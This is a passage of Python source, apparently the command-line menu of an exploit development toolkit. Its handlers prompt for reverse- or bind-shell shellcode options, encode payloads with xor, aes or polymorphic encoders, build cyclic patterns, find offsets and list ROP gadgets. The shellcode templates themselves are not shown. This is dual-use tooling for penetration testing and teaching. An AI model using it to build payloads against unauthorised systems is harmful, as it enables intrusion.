    dev = get_exploit_dev()

    # Menu key -> handler; every handler takes the toolkit instance.
    handlers = {
        '1': _cli_shellcode,
        '2': _cli_encoder,
        '3': _cli_pattern_create,
        '4': _cli_pattern_offset,
        '5': _cli_rop_gadgets,
        '6': _cli_disassemble,
    }

    while True:
        clear_screen()
        display_banner()
        print(f"\n{Colors.RED}{Colors.BOLD} Exploit Development Toolkit{Colors.RESET}")
        print(f"{Colors.DIM} Shellcode, encoders, ROP chains, patterns{Colors.RESET}")
        print(f"\n{Colors.CYAN} 1{Colors.RESET} Shellcode Generator")
        print(f"{Colors.CYAN} 2{Colors.RESET} Payload Encoder")
        print(f"{Colors.CYAN} 3{Colors.RESET} Pattern Create")
        print(f"{Colors.CYAN} 4{Colors.RESET} Pattern Offset")
        print(f"{Colors.CYAN} 5{Colors.RESET} ROP Gadgets")
        print(f"{Colors.CYAN} 6{Colors.RESET} Disassemble")
        print(f"{Colors.CYAN} 0{Colors.RESET} Back")

        choice = input(f"\n{Colors.WHITE} [{Colors.RED}exploit-dev{Colors.WHITE}]> {Colors.RESET}").strip()

        if choice == '0':
            break
        handler = handlers.get(choice)
        if handler is not None:
            handler(dev)
|
|
|
|
|
|
def _cli_shellcode(dev):
    """CLI: list the shellcode templates, prompt for options, print the result."""
    print(f"\n{Colors.BOLD}Available shellcode templates:{Colors.RESET}")
    for template in dev.list_shellcodes():
        print(f" {Colors.CYAN}{template['name']}{Colors.RESET} — {template['description']} ({template['length']} bytes)")

    # Blank answers fall back to the defaults; host and port stay optional.
    shell_type = input(f"\n{Colors.WHITE}Shell type (reverse_shell/bind_shell/execve): {Colors.RESET}").strip()
    shell_type = shell_type or 'execve'
    arch = input(f"{Colors.WHITE}Architecture (x86/x64/arm): {Colors.RESET}").strip()
    arch = arch or 'x64'
    platform = input(f"{Colors.WHITE}Platform (linux/windows): {Colors.RESET}").strip()
    platform = platform or 'linux'
    host = input(f"{Colors.WHITE}Host IP (for reverse/bind, or skip): {Colors.RESET}").strip()
    port = input(f"{Colors.WHITE}Port (for reverse/bind, or skip): {Colors.RESET}").strip()
    fmt = input(f"{Colors.WHITE}Output format (hex/c_array/python/nasm): {Colors.RESET}").strip()
    fmt = fmt or 'hex'

    result = dev.generate_shellcode(
        shell_type, arch, host or None, port or None, platform, output_format=fmt
    )
    if 'error' not in result:
        print(f"\n{Colors.GREEN}[+] Generated {result['length']} bytes ({result['template']}){Colors.RESET}")
        print(f"{Colors.DIM}{result['description']}{Colors.RESET}")
        print(f"\n{result['shellcode']}")
    else:
        print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")

    input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
|
|
|
|
|
|
def _cli_encoder(dev):
    """CLI: Payload encoder.

    Prompts for hex shellcode, encoder, key and iteration count, then prints
    the encoded payload and decoder stub. Returns immediately when no
    shellcode is entered.
    """
    sc_hex = input(f"\n{Colors.WHITE}Shellcode (hex): {Colors.RESET}").strip()
    if not sc_hex:
        return
    encoder = input(f"{Colors.WHITE}Encoder (xor/aes/alphanumeric/polymorphic): {Colors.RESET}").strip() or 'xor'
    key = input(f"{Colors.WHITE}Key (hex/string, or blank for random): {Colors.RESET}").strip() or None
    iters = input(f"{Colors.WHITE}Iterations (default 1): {Colors.RESET}").strip() or '1'

    # A typo in the iteration count should report an error, not abort the
    # whole menu with an uncaught ValueError.
    try:
        iterations = int(iters)
    except ValueError:
        print(f"\n{Colors.RED}Error: Iterations must be an integer{Colors.RESET}")
        input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        return

    result = dev.encode_payload(sc_hex, encoder, key, iterations)
    if 'error' in result:
        print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")
    else:
        print(f"\n{Colors.GREEN}[+] Encoded: {result['original_length']} -> {result['encoded_length']} bytes ({result['size_increase']}){Colors.RESET}")
        print(f"Key: {result['key']}")
        print(f"Null-free: {result['null_free']}")
        print(f"\n{Colors.CYAN}Decoder Stub:{Colors.RESET}\n{result['decoder_stub']}")
        print(f"\n{Colors.CYAN}Encoded payload (hex):{Colors.RESET}\n{result['encoded']}")

    input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
|
|
|
|
|
|
def _cli_pattern_create(dev):
    """CLI: Pattern create.

    Prompts for a length and prints the generated pattern. Returns
    immediately when no length is entered.
    """
    length = input(f"\n{Colors.WHITE}Pattern length: {Colors.RESET}").strip()
    if not length:
        return

    # Non-numeric input is reported instead of crashing the menu.
    try:
        wanted = int(length)
    except ValueError:
        print(f"\n{Colors.RED}Error: Pattern length must be an integer{Colors.RESET}")
        input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        return

    result = dev.generate_pattern(wanted)
    if 'error' in result:
        print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")
    else:
        print(f"\n{Colors.GREEN}[+] Pattern ({result['length']} bytes):{Colors.RESET}")
        print(result['pattern'])

    input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
|
|
|
|
|
|
def _cli_pattern_offset(dev):
    """CLI: Pattern offset finder.

    Prompts for the value to locate and the pattern length (default 20000),
    then prints the offset or the error reported by the lookup. Returns
    immediately when no value is entered.
    """
    value = input(f"\n{Colors.WHITE}Value to find (hex/int/string): {Colors.RESET}").strip()
    if not value:
        return
    length = input(f"{Colors.WHITE}Pattern length (default 20000): {Colors.RESET}").strip() or '20000'

    # Non-numeric input is reported instead of crashing the menu.
    try:
        pattern_length = int(length)
    except ValueError:
        print(f"\n{Colors.RED}Error: Pattern length must be an integer{Colors.RESET}")
        input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        return

    result = dev.find_pattern_offset(value, pattern_length)
    if result.get('offset', -1) >= 0:
        print(f"\n{Colors.GREEN}[+] Found at offset: {result['offset']}{Colors.RESET}")
        print(f" Matched: {result['matched']} ({result['endian']})")
    else:
        print(f"\n{Colors.RED}{result.get('error', 'Not found')}{Colors.RESET}")

    input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
|
|
|
|
|
|
def _cli_rop_gadgets(dev):
    """CLI: prompt for a binary and gadget type, then list up to 50 gadgets."""
    binary = input(f"\n{Colors.WHITE}Binary path: {Colors.RESET}").strip()
    if not binary:
        return

    gtype = input(f"{Colors.WHITE}Gadget type (all/pop_ret/xchg/mov/syscall/jmp_esp/call_reg): {Colors.RESET}").strip()
    # A blank answer or "all" means no type filter.
    if gtype == '' or gtype == 'all':
        gtype = None

    result = dev.find_rop_gadgets(binary, gtype)
    if 'error' not in result:
        total = result['count']
        print(f"\n{Colors.GREEN}[+] Found {total} gadgets (via {result['tool']}){Colors.RESET}\n")
        for entry in result['gadgets'][:50]:
            print(f" {Colors.CYAN}{entry['address']}{Colors.RESET}: {entry['gadget']} [{entry['type']}]")
        if total > 50:
            print(f"\n ... and {total - 50} more")
    else:
        print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")

    input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
|
|
|
|
|
|
def _cli_disassemble(dev):
    """CLI: prompt for hex bytes and an architecture, then print the listing."""
    hex_data = input(f"\n{Colors.WHITE}Hex bytes: {Colors.RESET}").strip()
    if not hex_data:
        return

    arch = input(f"{Colors.WHITE}Architecture (x86/x64/arm): {Colors.RESET}").strip()
    if not arch:
        arch = 'x64'

    result = dev.disassemble(hex_data, arch)
    if 'error' not in result:
        print(f"\n{Colors.GREEN}[+] {result['count']} instructions (via {result['tool']}){Colors.RESET}\n")
        print(result['listing'])
    else:
        print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")

    input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Singleton
|
|
# ---------------------------------------------------------------------------
|
|
|
|
# Module-wide cache for the toolkit object; filled on first request.
_instance = None


def get_exploit_dev() -> ExploitDev:
    """Return the shared ExploitDev instance, creating it on first use."""
    global _instance
    if _instance is not None:
        return _instance
    _instance = ExploitDev()
    return _instance
|